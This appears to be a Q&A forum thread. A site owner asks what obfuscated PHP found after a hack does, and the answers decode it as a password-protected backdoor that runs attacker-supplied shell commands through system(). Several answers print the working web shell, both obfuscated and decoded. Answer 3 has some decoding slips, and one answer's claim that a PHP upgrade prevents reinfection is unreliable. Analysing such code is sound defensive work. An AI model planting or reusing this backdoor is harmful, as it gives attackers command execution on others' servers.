My website got hacked - what does this code do?

Question

Someone hacked my site and included this code. Could someone explain what it does?

I've reformatted the spacing for better clarity. I've tried running the code but it looks like all it does is return an md5 hash. Is this harmless?

<? 

$GLOBALS['_131068239_']=Array(
    base64_decode('bWQ' .'1'),
    base64_decode('' .'dXJsZGV' .'jb' .'2Rl'),
    base64_decode('dX' .'JsZGVjb2Rl'),
    base64_decode('c3lz' .'dGVt')); 
?>

<? function 
     _787708145($i)
        {
            $a=Array(
                'MmNhZjY5MTdjYTNkOWEzYTg1ZDI2MDI5ZWQ2MjNiMWE=',
                'cA==',
                'cw==',
                '');
            return base64_decode($a[$i]);
        } 
?>

<?php 
    $_0=_787708145(0);

    $_1=$GLOBALS['_131068239_'][0]($GLOBALS['_131068239_'][1]($_REQUEST[_787708145(1)]));

    if($_1!=$_0)exit;

    $_2=$GLOBALS['_131068239_'][2]($_REQUEST[_787708145(2)]);

    if($_2==_787708145(3))exit;

    $GLOBALS['_131068239_'][3]($_2);exit; 
?>

Answer 1

I had a virus all over my WordPress server which included the same md5 encoded key. I posted about it here. It was heavily obfuscated, but below is the fully-decoded virus. They ran the code inside eval() which was inside create_function().

create_function() is depreciated as of PHP 7.2, so upgrading your server's PHP will prevent this from happening again. In my case the backdoor was in every functions.php file on my server, across two websites and every WordPress theme, whether in use or not.

$c = "2caf6917ca3d9a3a85d26029ed623b1a";
$p = md5(urldecode($_REQUEST["p"]));
if ($p != $c) exit;
$s = urldecode($_REQUEST["s"]);
if ($s == "") exit;
system($s);
exit;

I've also been having email troubles, so I suspect they were running programs to send spam.

Answer 2

Answer inline in the code comments below.
In short the script allows a shell to be either written or uploaded to your server.

Later edit: definitely not harmless, burn it with fire.

<?php 

$GLOBALS['_131068239_']=Array(
    base64_decode('bWQ' .'1'), // md5 - php function
    base64_decode('' .'dXJsZGV' .'jb' .'2Rl'), // urldecode - php function
    base64_decode('dX' .'JsZGVjb2Rl'), //urldecode - php function
    base64_decode('c3lz' .'dGVt')); //system - php function


function _787708145($i)
        {
            $a=Array(
                'MmNhZjY5MTdjYTNkOWEzYTg1ZDI2MDI5ZWQ2MjNiMWE=',
                'cA==',
                'cw==',
                '');
            return base64_decode($a[$i]);
        } 

$_0=_787708145(0); // md5 hash 2caf6917ca3d9a3a85d26029ed623b1a

$_1=$GLOBALS['_131068239_'][0]($GLOBALS['_131068239_'][1]($_REQUEST[_787708145(1)]));
// this is a function call md5(urldecode($_REQUEST[p]))
// this script is passed an url as a get or post parameter and getting md5 encoded

if($_1!=$_0)exit; // the md5 hash is compared here with the hash above

$_2=$GLOBALS['_131068239_'][2]($_REQUEST[_787708145(2)]); 
// another function call, urldecode($_REQUEST[s])
// another parameter is passed

if($_2==_787708145(3))exit; // if the urldecode above == blank then exit

$GLOBALS['_131068239_'][3]($_2); 
// execute system function with the "s" parameter, system(s)
// basically writing a shell on your server here

exit; 
// job done, exit :)

Answer 3

Yes, the above code is a backdoor. It requests the user a system command & this code executes that command on your server. Here is what the above code does!!

<? 
// Here all the strings are base64 encoded
$GLOBALS['_131068239_']=Array(
    base64_decode('bWQ' .'1'),                     // md5
    base64_decode('' .'dXJsZGV' .'jb' .'2Rl'),     // urldecode
    base64_decode('dX' .'JsZGVjb2Rl'),             // urldecode
    base64_decode('c3lz' .'dGVt'));                // system - syntax to execute PHP on the server
?>

In the above code, system is used to execute command on your server

<? function _787708145($i)     // Function Created
        {
            $a=Array(
                'MmNhZjY5MTdjYTNkOWEzYTg1ZDI2MDI5ZWQ2MjNiMWE=',   // MD5 string 2caf6917ca3d9a3a85d26029ed623b1a
                'cA==',      // p
                'cw==',      // s
                '');
            return base64_decode($a[$i]);
        } 
?>

Above is the function created

<?php 
    $_0=_787708145(0);

    $_1=$GLOBALS['_131068239_'][0]($GLOBALS['_131068239_'][1]($_REQUEST[_787708145(1)]));

    if($_1!=$_0)exit;

    $_2=$GLOBALS['_131068239_'][2]($_REQUEST[_787708145(2)]);

    if($_2==_787708145(3))exit;

    $GLOBALS['_131068239_'][3]($_2);exit; 
?>

This line

$_1=$GLOBALS['_131068239_'][0]($GLOBALS['_131068239_'][1]($_REQUEST[_787708145(1)]));

_787708145(1) : p

So $_REQUEST[_787708145(1)]) will asking for user to enter parameter with value with p parameter name

$GLOBALS['_131068239_'][1]($_REQUEST[_787708145(1)]) : urlencode($_REQUEST["p"])

$GLOBALS['_131068239_'][0]($GLOBALS['_131068239_'][1]($_REQUEST[_787708145(1)])) : md5(urlencode($_REQUEST["p"]))

It will match the password if($_1!=$_0)exit;

$GLOBALS['_131068239_'][2]($_REQUEST[_787708145(2)]); : urlencode($_REQUEST["s"]);

if($_2=="s")exit;

Now comes the final part i.e.

$GLOBALS['_131068239_'][3]($_2); : system($_2); // $_2 is the value supplied by the user to execute command

Answer 4

Decoding the base64 strings:

bWQ1 is md5

dXJsZGVjb2Rl is urldecode

c3lzdGVt is system

MmNhZjY5MTdjYTNkOWEzYTg1ZDI2MDI5ZWQ2MjNiMWE= is 2caf6917ca3d9a3a85d26029ed623b1a

dXJsZGVjb2Rl is urldecode

cA== is p

cw== is s

dXJsZGVjb2Rl is urldecode

This should provide some insight into the aim of the obfuscated code.

Answer 5

Not harmless. This is the code with the obfuscation stuff removed:

$_0 = '2caf6917ca3d9a3a85d26029ed623b1a';
$_1 = md5(urldecode($_REQUEST['p']));

if ($_1 != $_0) exit;

$_2 = urldecode($_REQUEST['s']);
if ($_2 == '') exit;

system($_2);
exit;

If this is present in a PHP file on your server, it means that a malicious user can craft an URL with p and s parameters, in order to execute any program on your server (using the system call) with the privileges of the user running your webserver.

I would advice you to get rid of this.